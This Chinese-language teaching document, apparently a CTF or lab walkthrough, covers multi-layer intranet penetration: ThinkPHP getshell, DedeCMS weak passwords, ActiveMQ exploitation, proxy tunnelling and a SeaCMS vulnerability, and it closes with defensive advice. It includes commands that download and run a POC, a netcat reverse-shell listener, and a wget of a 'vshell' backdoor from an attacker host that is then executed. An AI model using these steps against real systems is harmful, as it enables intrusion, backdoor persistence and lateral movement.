内网渗透测试实战教学文档<\/h1>

1. 初始入口点渗透<\/h2>

1.1 ThinkPHP框架漏洞利用<\/h3>

步骤：<\/strong><\/p>

发现目标系统使用ThinkPHP框架<\/li>
使用历史漏洞扫描工具对ThinkPHP进行扫描<\/li>
确认存在可利用漏洞后直接进行getshell操作<\/li> <\/ol>
工具推荐：<\/strong><\/p>

ThinkPHP漏洞扫描工具（如TPscan）<\/li>
AntSword（蚁剑）作为Webshell管理工具<\/li> <\/ul>
关键点：<\/strong><\/p>

熟悉ThinkPHP历史漏洞（如5.x版本的RCE漏洞）<\/li>
使用蚁剑连接获取的Webshell<\/li> <\/ul>
1.2 权限维持<\/h3>

通过蚁剑上传vshell后门<\/li>
使用vshell进行系统管理<\/li>
在根目录获取第一个flag<\/li> <\/ol>
2. 第二层内网渗透<\/h2>
2.1 内网信息收集<\/h3>
操作步骤：<\/strong><\/p>

查看网卡信息：ifconfig<\/code>或ipconfig<\/code><\/li>
使用fscan进行内网扫描<\/li>
发现内网CMS系统（如dedecms）<\/li> <\/ol> 关键命令：<\/strong><\/p> ifconfig fscan -h 目标IP段 <\/code><\/pre> 2.2 代理隧道建立<\/h3> 步骤：<\/strong><\/p> 使用vshell建立隧道代理<\/li> 配置BurpSuite的sock代理<\/li> 使用Burp内置浏览器访问内网CMS<\/li> <\/ol> 配置要点：<\/strong><\/p> 确保代理设置正确<\/li> 通过代理访问内网资源<\/li> <\/ul> 2.3 DedeCMS漏洞利用<\/h3> 攻击流程：<\/strong><\/p> 尝试默认弱口令（如admin\/admin）<\/li> 成功登录后台后上传木马<\/li> 通过蚁剑走代理连接上传的木马<\/li> 上传vshell进行正向连接管理<\/li> <\/ol> 关键点：<\/strong><\/p> 注意内网环境需要正向连接<\/li> 确保代理通道稳定<\/li> <\/ul> 3. 第三层内网渗透<\/h2> 3.1 内网扫描与发现<\/h3> 操作：<\/strong><\/p> 收集网卡信息<\/li> 发现第二张网卡（如10.10.10.0\/24网段）<\/li> 使用fscan扫描新发现的网段<\/li> <\/ol> 3.2 ActiveMQ漏洞利用<\/h3> 攻击步骤：<\/strong><\/p> 发现ActiveMQ服务（10.10.10.70）存在默认密码<\/li> 通过已控制的服务器(172.16.200.60)建立隧道代理<\/li> 配置BurpSuite访问ActiveMQ管理界面<\/li> 搜索并利用ActiveMQ的CVE漏洞<\/li> <\/ol> 详细过程：<\/strong><\/p> 在已控靶机上搭建HTTP服务： python -m http.server 8080 <\/code><\/pre> <\/li> 下载并执行POC： wget http:\/\/172.16.200.60:8080\/poc.py python poc.py <\/code><\/pre> <\/li> 在10.10.10.60上监听反弹shell： nc -lvp 4444 <\/code><\/pre> <\/li> <\/ol> 关键CVE：<\/strong><\/p> ActiveMQ反序列化漏洞（如CVE-2016-3088）<\/li> <\/ul> 4. 第四层内网渗透<\/h2> 4.1 权限维持与扩展<\/h3> 操作：<\/strong><\/p> 在反弹的shell中上传vshell正向木马<\/li> 通过wget下载并执行： wget http:\/\/attacker_ip\/vshell -O \/tmp\/vshell chmod +x \/tmp\/vshell \/tmp\/vshell <\/code><\/pre> <\/li> 本地连接正向木马<\/li> <\/ol> 4.2 深入内网渗透<\/h3> 步骤：<\/strong><\/p> 对新发现的网段进行扫描<\/li> 发现新站点并识别指纹（使用无影工具）<\/li> 识别为SeaCMS（版本v10.1）<\/li> <\/ol> 漏洞利用：<\/strong><\/p> 利用SeaCMS的CNVD-2020-22721漏洞<\/li> 参考FreeBuf上的POC：https:\/\/www.freebuf.com\/vuls\/268189.html<\/li> <\/ul> 5. 工具与技术总结<\/h2> 5.1 主要工具列表<\/h3> 扫描工具：<\/strong><\/p> fscan（内网综合扫描）<\/li> 无影（指纹识别）<\/li> <\/ul> <\/li> 代理工具：<\/strong><\/p> vshell（隧道代理）<\/li> BurpSuite（sock代理）<\/li> <\/ul> <\/li> 漏洞利用：<\/strong><\/p> ThinkPHP历史漏洞利用工具<\/li> DedeCMS弱口令爆破<\/li> ActiveMQ CVE利用工具<\/li> SeaCMS CNVD-2020-22721 POC<\/li> <\/ul> <\/li> Webshell管理：<\/strong><\/p> 蚁剑（AntSword）<\/li> vshell（权限维持）<\/li> <\/ul> <\/li> <\/ol> 5.2 关键技术点<\/h3> 多层代理技术：<\/strong><\/p> 通过已控主机建立跳板<\/li> 多层网络穿透<\/li> <\/ul> <\/li> 横向移动技术：<\/strong><\/p> 内网扫描发现新目标<\/li> 利用服务漏洞跨网段渗透<\/li> <\/ul> <\/li> 权限维持技术：<\/strong><\/p> 正向\/反向shell<\/li> Webshell上传与管理<\/li> <\/ul> <\/li> 漏洞利用技术：<\/strong><\/p> 框架漏洞利用（ThinkPHP）<\/li> CMS漏洞利用（DedeCMS, SeaCMS）<\/li> 中间件漏洞利用（ActiveMQ）<\/li> <\/ul> <\/li> <\/ol> 6. 防御建议<\/h2> 针对ThinkPHP：<\/strong><\/p> 及时更新框架版本<\/li> 禁用危险函数<\/li> <\/ul> <\/li> 针对DedeCMS：<\/strong><\/p> 修改默认管理员密码<\/li> 限制后台访问IP<\/li> 关闭不必要的上传功能<\/li> <\/ul> <\/li> 针对ActiveMQ：<\/strong><\/p> 修改默认凭据<\/li> 限制管理界面访问<\/li> 及时修补已知漏洞<\/li> <\/ul> <\/li> 通用防御措施：<\/strong><\/p> 网络分段隔离<\/li> 实施严格的访问控制<\/li> 定期安全审计<\/li> 日志监控与分析<\/li> <\/ul> <\/li> <\/ol> 7. 附录<\/h2> 7.1 参考资源<\/h3> ThinkPHP漏洞利用：https:\/\/github.com\/...<\/li> fscan工具：https:\/\/github.com\/shadow1ng\/fscan<\/li> ActiveMQ CVE详情：https:\/\/nvd.nist.gov\/...<\/li> SeaCMS POC：https:\/\/www.freebuf.com\/vuls\/268189.html<\/li> <\/ol> 7.2 常见问题解答<\/h3> Q：如何判断是否需要正向连接？<\/strong> A：当目标在内网且无法直接连接时，需要使用正向连接，让目标主动监听端口，攻击者去连接。<\/p> Q：多层内网渗透的关键是什么？<\/strong> A：关键是建立稳定的代理通道，并做好信息收集，逐步扩大控制范围。<\/p> Q：如何防止此类渗透？<\/strong> A：实施网络分段、最小权限原则、及时修补漏洞、加强日志监控和异常行为检测。<\/p>